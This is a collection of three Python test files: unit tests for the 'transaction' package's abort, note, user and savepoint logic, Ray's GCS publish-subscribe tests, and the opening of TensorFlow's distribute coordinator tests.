self.assertEqual(_hooked1, [])
self.assertEqual(_hooked2, [])
self.assertEqual(list(txn.getAfterCommitHooks()),
[(_hook1, ('one',), {'uno': 1}), (_hook2, (), {})])
self.assertEqual(txn._resources, [])
def test_abort_error_w_afterCompleteHooks(self):
from transaction import _transaction
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
class BrokenResource(object):
def sortKey(self):
return 'zzz'
def abort(self, txn):
raise ValueError('test')
broken = BrokenResource()
aaa = Resource('aaa')
broken2 = BrokenResource()
_hooked1, _hooked2 = [], []
def _hook1(*args, **kw):
_hooked1.append((args, kw))
def _hook2(*args, **kw):
_hooked2.append((args, kw))
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
txn = self._makeOne()
txn._after_commit.append((_hook1, ('one',), {'uno': 1}))
txn._after_commit.append((_hook2, (), {}))
txn._resources.append(aaa)
txn._resources.append(broken)
txn._resources.append(broken2)
logger._clear()
self.assertRaises(ValueError, txn.abort)
# Hooks are neither called nor cleared on abort
self.assertEqual(_hooked1, [])
self.assertEqual(_hooked2, [])
self.assertEqual(list(txn.getAfterCommitHooks()),
[(_hook1, ('one',), {'uno': 1}), (_hook2, (), {})])
self.assertTrue(aaa._a)
self.assertFalse(aaa._x)
def test_abort_error_w_synchronizers(self):
from transaction.weakset import WeakSet
from transaction.tests.common import DummyLogger
from transaction.tests.common import Monkey
from transaction import _transaction
class _Synch(object):
_before = _after = False
def beforeCompletion(self, txn):
self._before = txn
def afterCompletion(self, txn):
self._after = txn
synchs = [_Synch(), _Synch(), _Synch()]
ws = WeakSet()
for synch in synchs:
ws.add(synch)
class BrokenResource(object):
def sortKey(self):
return 'zzz'
def abort(self, txn):
raise ValueError('test')
broken = BrokenResource()
logger = DummyLogger()
with Monkey(_transaction, _LOGGER=logger):
t = self._makeOne(synchronizers=ws)
logger._clear()
t._resources.append(broken)
self.assertRaises(ValueError, t.abort)
for synch in synchs:
self.assertTrue(synch._before is t)
self.assertTrue(synch._after is t) #called in _cleanup
def test_abort_clears_resources(self):
class DM(object):
abort = lambda s, txn: True
dm = DM()
txn = self._makeOne()
txn.join(dm)
self.assertEqual(txn._resources, [dm])
txn.abort()
self.assertEqual(txn._resources, [])
def test_note(self):
txn = self._makeOne()
try:
txn.note(u'This is a note.')
self.assertEqual(txn.description, u'This is a note.')
txn.note(u'Another.')
self.assertEqual(txn.description, u'This is a note.\nAnother.')
finally:
txn.abort()
def test_note_bytes(self):
txn = self._makeOne()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
txn.note(b'haha')
self.assertNonTextDeprecationWarning(w)
self.assertEqual(txn.description, u'haha')
def test_note_None(self):
txn = self._makeOne()
self.assertEqual(u'', txn.description)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
txn.note(None)
self.assertFalse(w)
self.assertEqual(txn.description, u'')
def test_note_42(self):
txn = self._makeOne()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
txn.note(42)
self.assertNonTextDeprecationWarning(w)
self.assertEqual(txn.description, u'42')
def assertNonTextDeprecationWarning(self, w):
[w] = w
self.assertEqual(
(DeprecationWarning, "Expected text",
os.path.splitext(__file__)[0]),
(w.category, str(w.message), os.path.splitext(w.filename)[0]),
)
def test_description_bytes(self):
txn = self._makeOne()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
txn.description = b'haha'
self.assertNonTextDeprecationWarning(w)
self.assertEqual(txn.description, u'haha')
def test_description_42(self):
txn = self._makeOne()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
txn.description = 42
self.assertNonTextDeprecationWarning(w)
self.assertEqual(txn.description, u'42')
def test_description_None(self):
txn = self._makeOne()
self.assertEqual(u'', txn.description)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
txn.description = None
self.assertFalse(w)
self.assertEqual(txn.description, u'')
def test_setUser_default_path(self):
txn = self._makeOne()
txn.setUser(u'phreddy')
self.assertEqual(txn.user, u'/ phreddy')
def test_setUser_explicit_path(self):
txn = self._makeOne()
txn.setUser(u'phreddy', u'/bedrock')
self.assertEqual(txn.user, u'/bedrock phreddy')
def test_user_w_none(self):
txn = self._makeOne()
txn.user = b'phreddy'
with self.assertRaises(ValueError):
txn.user = None # resets to empty text
self.assertEqual(txn.user, u'phreddy')
def _test_user_non_text(self, user, path, expect, both=False):
txn = self._makeOne()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
if path:
txn.setUser(user, path)
else:
if path is None:
txn.setUser(user)
else:
txn.user = user
if both:
self.assertNonTextDeprecationWarning(w[:1])
self.assertNonTextDeprecationWarning(w[1:])
else:
self.assertNonTextDeprecationWarning(w)
self.assertEqual(expect, txn.user)
def test_user_non_text(self, user=b'phreddy', path=b'/bedrock',
expect=u"/bedrock phreddy", both=True):
self._test_user_non_text(b'phreddy', b'/bedrock',
u"/bedrock phreddy", True)
self._test_user_non_text(b'phreddy', None, u'/ phreddy')
self._test_user_non_text(b'phreddy', False, u'phreddy')
self._test_user_non_text(b'phreddy', u'/bedrock', u'/bedrock phreddy')
self._test_user_non_text(u'phreddy', b'/bedrock', u'/bedrock phreddy')
self._test_user_non_text(u'phreddy', 2, u'2 phreddy')
self._test_user_non_text(1, u'/bedrock', u'/bedrock 1')
self._test_user_non_text(1, 2, u'2 1', True)
def test_setExtendedInfo_single(self):
txn = self._makeOne()
txn.setExtendedInfo('frob', 'qux')
self.assertEqual(txn.extension, {u'frob': 'qux'})
self.assertTrue(txn._extension is txn._extension) # legacy
def test_setExtendedInfo_multiple(self):
txn = self._makeOne()
txn.setExtendedInfo('frob', 'qux')
txn.setExtendedInfo('baz', 'spam')
txn.setExtendedInfo('frob', 'quxxxx')
self.assertEqual(txn._extension, {u'frob': 'quxxxx', u'baz': 'spam'})
self.assertTrue(txn._extension is txn._extension) # legacy
def test__extension_settable(self):
# Because ZEO sets it. I'll fix ZEO, but maybe something else will break
txn = self._makeOne()
txn._extension = dict(baz='spam')
txn.setExtendedInfo('frob', 'qux')
self.assertEqual(txn.extension, {u'frob': 'qux', 'baz': 'spam'})
def test_data(self):
txn = self._makeOne()
# Can't get data that wasn't set:
with self.assertRaises(KeyError) as c:
txn.data(self)
self.assertEqual(c.exception.args, (self,))
data = dict(a=1)
txn.set_data(self, data)
self.assertEqual(txn.data(self), data)
# Can't get something we haven't stored.
with self.assertRaises(KeyError) as c:
txn.data(data)
self.assertEqual(c.exception.args, (data,))
# When the transaction ends, data are discarded:
txn.commit()
with self.assertRaises(KeyError) as c:
txn.data(self)
self.assertEqual(c.exception.args, (self,))
def test_isRetryableError_w_transient_error(self):
from transaction.interfaces import TransientError
from transaction._manager import TransactionManager
txn = self._makeOne(manager=TransactionManager())
txn._manager._txn = txn
self.assertTrue(txn.isRetryableError(TransientError()))
def test_isRetryableError_w_transient_subclass(self):
from transaction.interfaces import TransientError
from transaction._manager import TransactionManager
class _Derived(TransientError):
pass
txn = self._makeOne(manager=TransactionManager())
txn._manager._txn = txn
self.assertTrue(txn.isRetryableError(_Derived()))
def test_isRetryableError_w_normal_exception_no_resources(self):
from transaction._manager import TransactionManager
txn = self._makeOne(manager=TransactionManager())
txn._manager._txn = txn
self.assertFalse(txn.isRetryableError(Exception()))
def test_isRetryableError_w_normal_exception_w_resource_voting_yes(self):
from transaction._manager import TransactionManager
class _Resource(object):
def should_retry(self, err):
return True
txn = self._makeOne(manager=TransactionManager())
txn._manager._txn = txn
txn._resources.append(_Resource())
self.assertTrue(txn.isRetryableError(Exception()))
def test_isRetryableError_w_multiple(self):
from transaction._manager import TransactionManager
class _Resource(object):
_should = True
def should_retry(self, err):
return self._should
txn = self._makeOne(manager=TransactionManager())
txn._manager._txn = txn
res1 = _Resource()
res1._should = False
res2 = _Resource()
txn._resources.append(res1)
txn._resources.append(res2)
self.assertTrue(txn.isRetryableError(Exception()))
class MultiObjectResourceAdapterTests(unittest.TestCase):
def _getTargetClass(self):
from transaction._transaction import MultiObjectResourceAdapter
return MultiObjectResourceAdapter
def _makeOne(self, jar):
return self._getTargetClass()(jar)
def _makeJar(self, key):
class _Resource(Resource):
def __init__(self, key):
super(_Resource, self).__init__(key)
self._c = []
self._a = []
def commit(self, obj, txn):
self._c.append((obj, txn))
def abort(self, obj, txn):
self._a.append((obj, txn))
return _Resource(key)
def _makeDummy(self, kind, name):
class _Dummy(object):
def __init__(self, kind, name):
self._kind = kind
self._name = name
def __repr__(self):
return '<%s: %s>' % (self._kind, self._name)
return _Dummy(kind, name)
def test_ctor(self):
jar = self._makeJar('aaa')
mora = self._makeOne(jar)
self.assertTrue(mora.manager is jar)
self.assertEqual(mora.objects, [])
self.assertEqual(mora.ncommitted, 0)
def test___repr__(self):
jar = self._makeJar('bbb')
mora = self._makeOne(jar)
self.assertEqual(repr(mora),
'<MultiObjectResourceAdapter '
'for Resource: bbb at %s>' % id(mora))
def test_sortKey(self):
jar = self._makeJar('ccc')
mora = self._makeOne(jar)
self.assertEqual(mora.sortKey(), 'ccc')
def test_tpc_begin(self):
jar = self._makeJar('ddd')
mora = self._makeOne(jar)
txn = object()
mora.tpc_begin(txn)
self.assertTrue(jar._b)
def test_commit(self):
jar = self._makeJar('eee')
objects = [self._makeDummy('obj', 'a'), self._makeDummy('obj', 'b')]
mora = self._makeOne(jar)
mora.objects.extend(objects)
txn = self._makeDummy('txn', 'c')
mora.commit(txn)
self.assertEqual(jar._c, [(objects[0], txn), (objects[1], txn)])
def test_tpc_vote(self):
jar = self._makeJar('fff')
mora = self._makeOne(jar)
txn = object()
mora.tpc_vote(txn)
self.assertTrue(jar._v)
def test_tpc_finish(self):
jar = self._makeJar('ggg')
mora = self._makeOne(jar)
txn = object()
mora.tpc_finish(txn)
self.assertTrue(jar._f)
def test_abort(self):
jar = self._makeJar('hhh')
objects = [self._makeDummy('obj', 'a'), self._makeDummy('obj', 'b')]
mora = self._makeOne(jar)
mora.objects.extend(objects)
txn = self._makeDummy('txn', 'c')
mora.abort(txn)
self.assertEqual(jar._a, [(objects[0], txn), (objects[1], txn)])
def test_abort_w_error(self):
from transaction.tests.common import DummyLogger
jar = self._makeJar('hhh')
objects = [self._makeDummy('obj', 'a'),
self._makeDummy('obj', 'b'),
self._makeDummy('obj', 'c'),
]
_old_abort = jar.abort
def _abort(obj, txn):
if obj._name in ('b', 'c'):
raise ValueError()
_old_abort(obj, txn)
jar.abort = _abort
mora = self._makeOne(jar)
mora.objects.extend(objects)
txn = self._makeDummy('txn', 'c')
txn.log = log = DummyLogger()
self.assertRaises(ValueError, mora.abort, txn)
self.assertEqual(jar._a, [(objects[0], txn)])
def test_tpc_abort(self):
jar = self._makeJar('iii')
mora = self._makeOne(jar)
txn = object()
mora.tpc_abort(txn)
self.assertTrue(jar._x)
class Test_rm_key(unittest.TestCase):
def _callFUT(self, oid):
from transaction._transaction import rm_key
return rm_key(oid)
def test_miss(self):
self.assertTrue(self._callFUT(object()) is None)
def test_hit(self):
self.assertEqual(self._callFUT(Resource('zzz')), 'zzz')
class Test_object_hint(unittest.TestCase):
def _callFUT(self, oid):
from transaction._transaction import object_hint
return object_hint(oid)
def test_miss(self):
class _Test(object):
pass
test = _Test()
self.assertEqual(self._callFUT(test), "_Test oid=None")
def test_hit(self):
class _Test(object):
pass
test = _Test()
test._p_oid = 'OID'
self.assertEqual(self._callFUT(test), "_Test oid='OID'")
class Test_oid_repr(unittest.TestCase):
def _callFUT(self, oid):
from transaction._transaction import oid_repr
return oid_repr(oid)
def test_as_nonstring(self):
self.assertEqual(self._callFUT(123), '123')
def test_as_string_not_8_chars(self):
self.assertEqual(self._callFUT('a'), "'a'")
def test_as_string_z64(self):
s = '\0'*8
self.assertEqual(self._callFUT(s), '0x00')
def test_as_string_all_Fs(self):
s = '\1'*8
self.assertEqual(self._callFUT(s), '0x0101010101010101')
def test_as_string_xxx(self):
s = '\20'*8
self.assertEqual(self._callFUT(s), '0x1010101010101010')
class DataManagerAdapterTests(unittest.TestCase):
def _getTargetClass(self):
from transaction._transaction import DataManagerAdapter
return DataManagerAdapter
def _makeOne(self, jar):
return self._getTargetClass()(jar)
def _makeJar(self, key):
class _Resource(Resource):
_p = False
def prepare(self, txn):
self._p = True
return _Resource(key)
def _makeDummy(self, kind, name):
class _Dummy(object):
def __init__(self, kind, name):
self._kind = kind
self._name = name
def __repr__(self):
return '<%s: %s>' % (self._kind, self._name)
return _Dummy(kind, name)
def test_ctor(self):
jar = self._makeJar('aaa')
dma = self._makeOne(jar)
self.assertTrue(dma._datamanager is jar)
def test_commit(self):
jar = self._makeJar('bbb')
mora = self._makeOne(jar)
txn = self._makeDummy('txn', 'c')
mora.commit(txn)
self.assertFalse(jar._c) #no-op
def test_abort(self):
jar = self._makeJar('ccc')
mora = self._makeOne(jar)
txn = self._makeDummy('txn', 'c')
mora.abort(txn)
self.assertTrue(jar._a)
def test_tpc_begin(self):
jar = self._makeJar('ddd')
mora = self._makeOne(jar)
txn = object()
mora.tpc_begin(txn)
self.assertFalse(jar._b) #no-op
def test_tpc_abort(self):
jar = self._makeJar('eee')
mora = self._makeOne(jar)
txn = object()
mora.tpc_abort(txn)
self.assertFalse(jar._f)
self.assertTrue(jar._a)
def test_tpc_finish(self):
jar = self._makeJar('fff')
mora = self._makeOne(jar)
txn = object()
mora.tpc_finish(txn)
self.assertFalse(jar._f)
self.assertTrue(jar._c)
def test_tpc_vote(self):
jar = self._makeJar('ggg')
mora = self._makeOne(jar)
txn = object()
mora.tpc_vote(txn)
self.assertFalse(jar._v)
self.assertTrue(jar._p)
def test_sortKey(self):
jar = self._makeJar('hhh')
mora = self._makeOne(jar)
self.assertEqual(mora.sortKey(), 'hhh')
class SavepointTests(unittest.TestCase):
def _getTargetClass(self):
from transaction._transaction import Savepoint
return Savepoint
def _makeOne(self, txn, optimistic, *resources):
return self._getTargetClass()(txn, optimistic, *resources)
def test_ctor_w_savepoint_oblivious_resource_non_optimistic(self):
txn = object()
resource = object()
self.assertRaises(TypeError, self._makeOne, txn, False, resource)
def test_ctor_w_savepoint_oblivious_resource_optimistic(self):
from transaction._transaction import NoRollbackSavepoint
txn = object()
resource = object()
sp = self._makeOne(txn, True, resource)
self.assertEqual(len(sp._savepoints), 1)
self.assertTrue(isinstance(sp._savepoints[0], NoRollbackSavepoint))
self.assertTrue(sp._savepoints[0].datamanager is resource)
def test_ctor_w_savepoint_aware_resources(self):
class _Aware(object):
def savepoint(self):
return self
txn = object()
one = _Aware()
another = _Aware()
sp = self._makeOne(txn, True, one, another)
self.assertEqual(len(sp._savepoints), 2)
self.assertTrue(isinstance(sp._savepoints[0], _Aware))
self.assertTrue(sp._savepoints[0] is one)
self.assertTrue(isinstance(sp._savepoints[1], _Aware))
self.assertTrue(sp._savepoints[1] is another)
def test_valid_wo_transacction(self):
sp = self._makeOne(None, True, object())
self.assertFalse(sp.valid)
def test_valid_w_transacction(self):
sp = self._makeOne(object(), True, object())
self.assertTrue(sp.valid)
def test_rollback_w_txn_None(self):
from transaction.interfaces import InvalidSavepointRollbackError
txn = None
class _Aware(object):
def savepoint(self):
return self
resource = _Aware()
sp = self._makeOne(txn, False, resource)
self.assertRaises(InvalidSavepointRollbackError, sp.rollback)
def test_rollback_w_sp_error(self):
class _TXN(object):
_sarce = False
_raia = None
def _saveAndRaiseCommitishError(self):
import sys
from transaction._compat import reraise
self._sarce = True
reraise(*sys.exc_info())
def _remove_and_invalidate_after(self, sp):
self._raia = sp
class _Broken(object):
def rollback(self):
raise ValueError()
_broken = _Broken()
class _GonnaRaise(object):
def savepoint(self):
return _broken
txn = _TXN()
resource = _GonnaRaise()
sp = self._makeOne(txn, False, resource)
self.assertRaises(ValueError, sp.rollback)
self.assertTrue(txn._raia is sp)
self.assertTrue(txn._sarce)
class AbortSavepointTests(unittest.TestCase):
def _getTargetClass(self):
from transaction._transaction import AbortSavepoint
return AbortSavepoint
def _makeOne(self, datamanager, transaction):
return self._getTargetClass()(datamanager, transaction)
def test_ctor(self):
dm = object()
txn = object()
asp = self._makeOne(dm, txn)
self.assertTrue(asp.datamanager is dm)
self.assertTrue(asp.transaction is txn)
def test_rollback(self):
class _DM(object):
_aborted = None
def abort(self, txn):
self._aborted = txn
class _TXN(object):
_unjoined = None
def _unjoin(self, datamanager):
self._unjoin = datamanager
dm = _DM()
txn = _TXN()
asp = self._makeOne(dm, txn)
asp.rollback()
self.assertTrue(dm._aborted is txn)
self.assertTrue(txn._unjoin is dm)
class NoRollbackSavepointTests(unittest.TestCase):
def _getTargetClass(self):
from transaction._transaction import NoRollbackSavepoint
return NoRollbackSavepoint
def _makeOne(self, datamanager):
return self._getTargetClass()(datamanager)
def test_ctor(self):
dm = object()
nrsp = self._makeOne(dm)
self.assertTrue(nrsp.datamanager is dm)
def test_rollback(self):
dm = object()
nrsp = self._makeOne(dm)
self.assertRaises(TypeError, nrsp.rollback)
class MiscellaneousTests(unittest.TestCase):
def test_BBB_join(self):
# The join method is provided for "backward-compatability" with ZODB 4
# data managers.
from transaction import Transaction
from transaction.tests.examples import DataManager
from transaction._transaction import DataManagerAdapter
# The argument to join must be a zodb4 data manager,
# transaction.interfaces.IDataManager.
txn = Transaction()
dm = DataManager()
txn.join(dm)
# The end result is that a data manager adapter is one of the
# transaction's objects:
self.assertTrue(isinstance(txn._resources[0], DataManagerAdapter))
self.assertTrue(txn._resources[0]._datamanager is dm)
def test_bug239086(self):
# The original implementation of thread transaction manager made
# invalid assumptions about thread ids.
import threading
import transaction
import transaction.tests.savepointsample as SPS
dm = SPS.SampleSavepointDataManager()
self.assertEqual(list(dm.keys()), [])
class Sync:
def __init__(self, label):
self.label = label
self.log = []
def beforeCompletion(self, txn):
self.log.append('%s %s' % (self.label, 'before'))
def afterCompletion(self, txn):
self.log.append('%s %s' % (self.label, 'after'))
def newTransaction(self, txn):
self.log.append('%s %s' % (self.label, 'new'))
def run_in_thread(f):
txn = threading.Thread(target=f)
txn.start()
txn.join()
sync = Sync(1)
@run_in_thread
def first():
transaction.manager.registerSynch(sync)
transaction.manager.begin()
dm['a'] = 1
self.assertEqual(sync.log, ['1 new'])
@run_in_thread
def second():
transaction.abort() # should do nothing.
self.assertEqual(sync.log, ['1 new'])
self.assertEqual(list(dm.keys()), ['a'])
dm = SPS.SampleSavepointDataManager()
self.assertEqual(list(dm.keys()), [])
@run_in_thread
def third():
dm['a'] = 1
self.assertEqual(sync.log, ['1 new'])
transaction.abort() # should do nothing
self.assertEqual(list(dm.keys()), ['a'])
def test_gh5(self):
from transaction import _transaction
from transaction._compat import native_
buffer = _transaction._makeTracebackBuffer()
s = u'ąčę'
buffer.write(s)
buffer.seek(0)
self.assertEqual(buffer.read(), native_(s, 'utf-8'))
class Resource(object):
_b = _c = _v = _f = _a = _x = _after = False
def __init__(self, key, error=None):
self._key = key
self._error = error
def __repr__(self):
return 'Resource: %s' % self._key
def sortKey(self):
return self._key
def tpc_begin(self, txn):
if self._error == 'tpc_begin':
raise ValueError()
self._b = True
def commit(self, txn):
if self._error == 'commit':
raise ValueError()
self._c = True
def tpc_vote(self, txn):
if self._error == 'tpc_vote':
raise ValueError()
self._v = True
def tpc_finish(self, txn):
if self._error == 'tpc_finish':
raise ValueError()
self._f = True
def abort(self, txn):
if self._error == 'abort':
raise ValueError()
self._a = True
def tpc_abort(self, txn):
if self._error == 'tpc_abort':
raise ValueError()
self._x = True
def afterCompletion(self, txn):
if self._error == 'afterCompletion':
raise ValueError()
self._after = True
def test_suite():
return unittest.TestSuite((
unittest.makeSuite(TransactionTests),
unittest.makeSuite(MultiObjectResourceAdapterTests),
unittest.makeSuite(Test_rm_key),
unittest.makeSuite(Test_object_hint),
unittest.makeSuite(Test_oid_repr),
unittest.makeSuite(DataManagerAdapterTests),
unittest.makeSuite(SavepointTests),
unittest.makeSuite(AbortSavepointTests),
unittest.makeSuite(NoRollbackSavepointTests),
unittest.makeSuite(MiscellaneousTests),
))
if __name__ == '__main__':
unittest.main()
|
test_gcs_pubsub.py | import sys
import threading
import ray
import ray._private.gcs_utils as gcs_utils
from ray._private.gcs_pubsub import GcsPublisher, GcsErrorSubscriber, \
GcsLogSubscriber, GcsAioPublisher, GcsAioSubscriber
from ray.core.generated.gcs_pb2 import ErrorTableData
import pytest
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"gcs_grpc_based_pubsub": True
}
}],
indirect=True)
def test_publish_and_subscribe_error_info(ray_start_regular):
address_info = ray_start_regular
redis = ray._private.services.create_redis_client(
address_info["redis_address"],
password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
gcs_server_addr = gcs_utils.get_gcs_address_from_redis(redis)
subscriber = GcsErrorSubscriber(address=gcs_server_addr)
subscriber.subscribe()
publisher = GcsPublisher(address=gcs_server_addr)
err1 = ErrorTableData(error_message="test error message 1")
err2 = ErrorTableData(error_message="test error message 2")
publisher.publish_error(b"aaa_id", err1)
publisher.publish_error(b"bbb_id", err2)
assert subscriber.poll() == (b"aaa_id", err1)
assert subscriber.poll() == (b"bbb_id", err2)
subscriber.close()
@pytest.mark.asyncio
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"gcs_grpc_based_pubsub": True
}
}],
indirect=True)
async def test_aio_publish_and_subscribe_error_info(ray_start_regular):
address_info = ray_start_regular
redis = ray._private.services.create_redis_client(
address_info["redis_address"],
password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
gcs_server_addr = gcs_utils.get_gcs_address_from_redis(redis)
subscriber = GcsAioSubscriber(address=gcs_server_addr)
await subscriber.subscribe_error()
publisher = GcsAioPublisher(address=gcs_server_addr)
err1 = ErrorTableData(error_message="test error message 1")
err2 = ErrorTableData(error_message="test error message 2")
await publisher.publish_error(b"aaa_id", err1)
await publisher.publish_error(b"bbb_id", err2)
assert await subscriber.poll_error() == (b"aaa_id", err1)
assert await subscriber.poll_error() == (b"bbb_id", err2)
await subscriber.close()
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"gcs_grpc_based_pubsub": True
}
}],
indirect=True)
def test_publish_and_subscribe_logs(ray_start_regular):
address_info = ray_start_regular
redis = ray._private.services.create_redis_client(
address_info["redis_address"],
password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
gcs_server_addr = gcs_utils.get_gcs_address_from_redis(redis)
subscriber = GcsLogSubscriber(address=gcs_server_addr)
subscriber.subscribe()
publisher = GcsPublisher(address=gcs_server_addr)
log_batch = {
"ip": "127.0.0.1",
"pid": 1234,
"job": "0001",
"is_err": False,
"lines": ["line 1", "line 2"],
"actor_name": "test actor",
"task_name": "test task",
}
publisher.publish_logs(log_batch)
# PID is treated as string.
log_batch["pid"] = "1234"
assert subscriber.poll() == log_batch
subscriber.close()
@pytest.mark.asyncio
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"gcs_grpc_based_pubsub": True
}
}],
indirect=True)
async def test_aio_publish_and_subscribe_logs(ray_start_regular):
address_info = ray_start_regular
redis = ray._private.services.create_redis_client(
address_info["redis_address"],
password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
gcs_server_addr = gcs_utils.get_gcs_address_from_redis(redis)
subscriber = GcsAioSubscriber(address=gcs_server_addr)
await subscriber.subscribe_logs()
publisher = GcsAioPublisher(address=gcs_server_addr)
log_batch = {
"ip": "127.0.0.1",
"pid": "gcs",
"job": "0001",
"is_err": False,
"lines": ["line 1", "line 2"],
"actor_name": "test actor",
"task_name": "test task",
}
await publisher.publish_logs(log_batch)
assert await subscriber.poll_logs() == log_batch
await subscriber.close()
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"gcs_grpc_based_pubsub": True
}
}],
indirect=True)
def test_subscribe_two_channels(ray_start_regular):
"""Tests concurrently subscribing to two channels work."""
address_info = ray_start_regular
redis = ray._private.services.create_redis_client(
address_info["redis_address"],
password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
gcs_server_addr = gcs_utils.get_gcs_address_from_redis(redis)
num_messages = 100
errors = []
def receive_errors():
subscriber = GcsErrorSubscriber(address=gcs_server_addr)
subscriber.subscribe()
while len(errors) < num_messages:
_, msg = subscriber.poll()
errors.append(msg)
logs = []
def receive_logs():
subscriber = GcsLogSubscriber(address=gcs_server_addr)
subscriber.subscribe()
while len(logs) < num_messages:
log_batch = subscriber.poll()
logs.append(log_batch)
t1 = threading.Thread(target=receive_errors)
t1.start()
t2 = threading.Thread(target=receive_logs)
t2.start()
publisher = GcsPublisher(address=gcs_server_addr)
for i in range(0, num_messages):
publisher.publish_error(
b"msg_id", ErrorTableData(error_message=f"error {i}"))
publisher.publish_logs({
"ip": "127.0.0.1",
"pid": "gcs",
"job": "0001",
"is_err": False,
"lines": [f"line {i}"],
"actor_name": "test actor",
"task_name": "test task",
})
t1.join(timeout=10)
assert not t1.is_alive(), len(errors)
assert len(errors) == num_messages, len(errors)
t2.join(timeout=10)
assert not t2.is_alive(), len(logs)
assert len(logs) == num_messages, len(logs)
for i in range(0, num_messages):
assert errors[i].error_message == f"error {i}"
assert logs[i]["lines"][0] == f"line {i}"
if __name__ == "__main__":
sys.exit(pytest.main(["-v", __file__]))
|
distribute_coordinator_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Distribute Coordinator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import copy
import json
import os
import sys
import time
import threading
import six
# pylint: disable=invalid-name
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: enable=invalid-name
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.distribute import distribute_coordinator
from tensorflow.python.distribute import distribute_coordinator_context
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import monitored_session
CHIEF = distribute_coordinator._TaskType.CHIEF
WORKER = distribute_coordinator._TaskType.WORKER
PS = distribute_coordinator._TaskType.PS
EVALUATOR = distribute_coordinator._TaskType.EVALUATOR
STANDALONE_CLIENT = distribute_coordinator.CoordinatorMode.STANDALONE_CLIENT
INDEPENDENT_WORKER = distribute_coordinator.CoordinatorMode.INDEPENDENT_WORKER
NUM_WORKERS = 3
NUM_PS = 2
original_sys_exit = sys.exit
def _bytes_to_str(maybe_bytes):
if isinstance(maybe_bytes, six.string_types):
return maybe_bytes
else:
return str(maybe_bytes, "utf-8")
def _strip_protocol(target):
# cluster_spec expects "host:port" strings.
if "//" in target:
return target.split("//")[1]
else:
return target
class MockStrategy(object):
def __init__(self,
between_graph=False,
should_init=None,
should_checkpoint=None,
should_save_summary=None):
self._between_graph = between_graph
self._should_init = should_init
self._should_checkpoint = should_checkpoint
self._should_save_summary = should_save_summary
@property
def between_graph(self):
return self._between_graph
def configure(self,
session_config=None,
cluster_spec=None,
task_type=None,
task_id=None):
if self._should_init is None:
if task_id == 0:
self._should_init = True
else:
self._should_init = False
if self._should_checkpoint is None:
if task_id == 0:
self._should_checkpoint = True
else:
self._should_checkpoint = False
if self._should_save_summary is None:
if task_id == 0:
self._should_save_summary = True
else:
self._should_save_summary = False
if session_config:
if (cluster_spec and task_type and task_id is not None and
self._between_graph):
session_config.intra_op_parallelism_threads += 1
if task_type in ["chief", "worker"]:
session_config.device_filters.extend(
["/job:%s/task:%d" % (task_type, task_id), "/job:ps"])
else:
session_config.inter_op_parallelism_threads += 1
session_config.device_filters.append("/job:somejob")
@property
def should_init(self):
return self._should_init
@property
def should_checkpoint(self):
return self._should_checkpoint
@property
def should_save_summary(self):
return self._should_save_summary
class MockServer(object):
def __init__(self):
self._joined = False
def join(self):
assert not self._joined
self._joined = True
@property
def joined(self):
return self._joined
class DistributeCoordinatorTestBase(test.TestCase):
@classmethod
def setUpClass(cls):
# We have to create a global in-process cluster because once an in-process
# tensorflow server is created, there is no way to terminate it. Please see
# multi_worker_test_base.py for more details.
cls._workers, cls._ps = test_util.create_local_cluster(
NUM_WORKERS, num_ps=NUM_PS)
cls._cluster_spec = {
WORKER: [
_strip_protocol(_bytes_to_str(w.target)) for w in cls._workers
],
PS: [_strip_protocol(_bytes_to_str(ps.target)) for ps in cls._ps]
}
def setUp(self):
self._result_correct = 0
self._lock = threading.Lock()
self._worker_context = {}
self._strategy_property = {}
self._std_servers = {}
self._barrier = distribute_coordinator._Barrier(NUM_WORKERS)
@contextlib.contextmanager
def _test_session(self, target):
config = config_pb2.ConfigProto(allow_soft_placement=True)
config.graph_options.optimizer_options.opt_level = -1
with session.Session(graph=None, config=config, target=target) as sess:
yield sess
def _create_cluster_spec(self,
has_chief=False,
num_workers=1,
num_ps=0,
has_eval=False):
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
cluster_spec = {}
if has_chief:
cluster_spec[CHIEF] = ["localhost:%s" % portpicker.pick_unused_port()]
if num_workers:
cluster_spec[WORKER] = [
"localhost:%s" % portpicker.pick_unused_port()
for _ in range(num_workers)
]
if num_ps:
cluster_spec[PS] = [
"localhost:%s" % portpicker.pick_unused_port() for _ in range(num_ps)
]
if has_eval:
cluster_spec[EVALUATOR] = ["localhost:%s" % portpicker.pick_unused_port()]
